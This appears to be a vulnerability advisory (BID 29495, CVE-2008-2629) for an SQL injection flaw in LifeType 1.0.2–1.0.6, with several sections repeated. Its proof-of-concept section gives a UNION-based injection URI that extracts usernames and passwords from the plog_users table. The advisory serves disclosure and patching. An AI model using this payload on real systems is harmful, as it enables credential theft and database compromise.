LifeType 'index.php' SQL Injection Vulnerability
BID:29495
Info
LifeType 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 29495 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2629 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 02 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | DreamTurk |
| Vulnerable: |
LifeType LifeType 1.0.6 LifeType LifeType 1.0.5 LifeType LifeType 1.0.4 LifeType LifeType 1.0.3 LifeType LifeType 1.0.2 |
| Not Vulnerable: | |
Discussion
LifeType 'index.php' SQL Injection Vulnerability
LifeType is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LifeType is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
LifeType 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1
Solution / Fix
LifeType 'index.php' SQL Injection Vulnerability
Solution:
The vendor released an update to address this issue. Please see the references for more information.
Solution:
The vendor released an update to address this issue. Please see the references for more information.
References
LifeType 'index.php' SQL Injection Vulnerability
References:
References:
- LifeType Home Page (LifeType)
- Drupal Security Advisory DRUPAL-SA-2008-031 (Drupal)